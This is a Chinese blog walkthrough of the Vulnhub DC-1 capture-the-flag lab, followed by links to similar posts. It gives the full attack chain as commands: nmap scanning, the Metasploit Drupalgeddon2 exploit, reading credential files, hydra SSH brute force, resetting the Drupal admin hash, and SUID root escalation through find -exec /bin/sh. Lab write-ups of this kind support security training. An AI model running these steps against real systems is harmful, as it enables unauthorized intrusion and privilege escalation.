Vulnhub:DC-1练习

最新推荐文章于 2024-07-28 21:48:18 发布
最新推荐文章于 2024-07-28 21:48:18 发布
阅读量316 收藏 1
点赞数
分类专栏: Vulnhub 文章标签: vulnhub DC-1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangtaile/article/details/98500993
版权

靶机介绍
download靶机
https://www.vulnhub.com/entry/dc-1,292/
DC-1的介绍如下
这个靶机需要获得root权限,并找到所有的5个flag

主机发现、扫描IP
DC-1是和我们在同一个局域网,我们可以使用arp-scan去主机发现,命令如下
arp-scan -l
在这里插入图片描述
发现第三个是目标主机,ip:172.16.183.135

namp端口扫描
nmap -sVC -p- 172.16.183.135
在这里插入图片描述
开放了3个端口 22、80、111
打开80段查看,发现是drupal cms,使用Metasploit进行漏洞查找攻击在这里插入图片描述

漏洞查找
kali上自带的msfconsose可以自动化查找出一些框架的漏洞,并加以利用(都是已经公布过的)
使用最新的漏洞尝试攻击
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhost 172.16.183.135
exploit
在这里插入图片描述
看到提示Meterpreter session 1opened并出现,说明已经攻击成功
执行命令shell命令获得shell
在这里插入图片描述
get shell
通过上面的shell命令,我们已经可以对靶机的目录进行操作了,ls发现flag1.txt,cat查看内容
在这里插入图片描述
里面给了提示:
Every good CMS needs a config file - and so do you.
让我们去看配置文件,drupal的配置文件默认是/sites/defult/settings.php,我们切换过去看看
在这里插入图片描述
发现又给出了提示,说暴力破解不是唯一的方法,还给出了数据库的账号和密码,所以就想到登陆一下看看里面的用户能不能得到网站登陆的账号和密码。但是发现在shell下的mysql无法打开。

另寻思路
直接看passwd的内容在这里插入图片描述

发现flag4用户。这里可以用到hydra+john the Ripper爆破。
hydra是kali自带的工具
在这里插入图片描述
-l 指定用户
-P 指定密码字典文件

得到flag4用户的密码为orange
通过ssh远程连接,然后用上面flag2得到的mysql账号和密码去登陆
在这里插入图片描述
这样就可以通过mysql进行数据库的一系列操作了

show databases;
use drupaldb;
show tables;
select * from users;
在这里插入图片描述
得到了用户的账号和密码,但是密码经过加密了,百度查找drupal重置密码的方法,直接把user表里的管理员字段改为
S S SCDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4
在这里插入图片描述
然后就可以用下面的密码登陆了!
password
尝试在网站上登陆,admin/password可以成功登陆,并且发现提示
在这里插入图片描述

提权
根据上面的提示发现perm,是让我们通过suid提权,SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。

使用python生成一个TTY shell
python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述
在服务器上找到一个带有 suid 权限的文件,发现“find”命令设置了SUID位。
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述

创建一个文件,查找文件后执行命令,root权限
touch 123
find 123 -exec “whami” ;
在这里插入图片描述
~$ find / -type f -name getflag -exec "/bin/sh" ;

ls(成功提权)

在这里插入图片描述
成功拿到flag

salt0wn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-DC转换器数学模型:DC-DC转换器支持Buck、Boost、Buck-Boost转换器选择和闭环设计。-matlab开发
06-01
DC-DC转换器是电子工程领域中至关重要的组件,它用于改变直流电源的电压等级,以适应不同设备或系统的需求。在本项目中,我们关注的是利用MATLAB进行DC-DC转换器的数学建模,特别是Buck、Boost和Buck-Boost三种基本...
VulnHub系列(一)DC-1
2022年7月6日从博客园https://www.cnblogs.com/hugboy/ 学习记录博客。
05-08 3341
环境 kali linux 和 DC-1 都是搭建在VMware上的虚拟机,都是NAT模式。 主机发现 NAT模式下虚拟机没有被分配真实的ip地址,他们通过共享宿主机的ip地址访问互联网。我们可以通过它的MAC地址00:0C:29:23:E2:8D查到宿主机分配给他的虚拟ip。 arp-scan -l=>192.168.62.134 还有另一种方法,假设我们已经和目标在同一个局域网下:...
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2540
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
vulnhub-DC-1渗透(详细原理讲解)
最新发布
weixin_65891791的博客
07-28 1470
最基础的就是使用arp-scan、nmap扫描工具,然后这里用到了我之前都没使用到的MySQL的操作,虽然比较基础的,show databases、use databases、select * from tables之类的命令,也是一个小小的进步吧,之前在学校里面学习过一些mysql的基本语法选择语句,这里与渗透攻击相结合使用了,还有就是提权的操作也是我之前没有用到的。确实好像没什么相关的,那就又一个一个的去找,最后在这个/etc的文件下找到了一个passwd的文件,查看这个文件就得到了flag4的提示。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 8433
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub练习 DC-1复现及分析
黑战士的博客
02-20 1002
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
DC1(VulnHub)
carmi的博客
02-05 399
DC1(VulnHub) 1 2 3 4、flag1提示 flag1提示:Every good CMS needs a config file - and so do you. 5、flag2提示 flag2提示:Brute force and dictionary attacks aren't the only ways to gain access (and you WILL ne...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
dc-mapv:DC-Mapv 是 DC-SDK 与 百度 Mapv 融合的产品。主要用于在 3D 场景中展现大数据
05-06
DC-Mapv是与dc-sdk和百度Mapv集成的产品。 它主要用于在3D场景中显示大数据。 Tips:This SDK is JS+GIS framework package. Developers need to have some front-end technology and GIS related technology 安装 ...
dc-chart:DC-Chart 是 DC-SDK 与 Echarts 融合的产品。主要用于在 3D 场景中添加 echart 的统计图表。将统计图表 Gis 化
05-06
直流图 | DC-Chart是dc-sdk和Echarts集成的产品。 主要用于向3D场景添加Echarts的统​​计图。 根据统计图表Tips:This SDK is JS+GIS framework package. Developers need to have some front-end technology and ...
dctts-pytorch:DC-TTS的pytorch实现
05-11
DC-TTS 的papar的pytorch实现。 感谢 ,它为我克服了一些困难提供了很多帮助。 数据集 。 一个公共领域的语音数据集,由一个女性发言人的13,100个简短音频片段组成。 火车 我已经调整了超参数,并使用LJ语音数据集...
Vulnhub -- DC1靶机渗透
Gh0st_1n_The_Shell的博客
06-02 152
信息收集 开启了 22端口,ssh服务 80,http服务 111,RPC服务 先观察80端口 发现采用的是Drupal的cms 目录爆破: 但是,没有找到可以直接利用的点 登录的页面进行SQL注入即不报错,也不执行SQL语句 无法爆破出用户,尝试以账号名admin盲爆密码 发现后面长度都变为8497了 打开一看,发现原来有限制登录次数,看来暴力破解是无效了 创建用户界面需要填入邮箱,但是填入后并不会发送邮件过来,可能只是个摆设 只能在msf搜索关于这个cms的漏洞 直接用次新的 .
Vulnhub靶机渗透学习——DC-1
qq_45612828的博客
10-13 157
Metasploit的EXP使用drupal 7的漏洞通过配置文件获取数据库账号数据库更新密码SUID 提权——find。
Vulnhub | DC: 1 |【实战】
bin789456的博客
05-12 401
写在前面 来做做实战吧,学习攻击思路,和一些安全工具的熟悉 主机发现
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 765
Vulnhub靶机:DC-1渗透详细过程
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2569
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
VulnHub DC-1
weixin_45682839的博客
04-13 346
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4512
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhub靶场之DC-3
qq_58091216的博客
01-08 1313
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值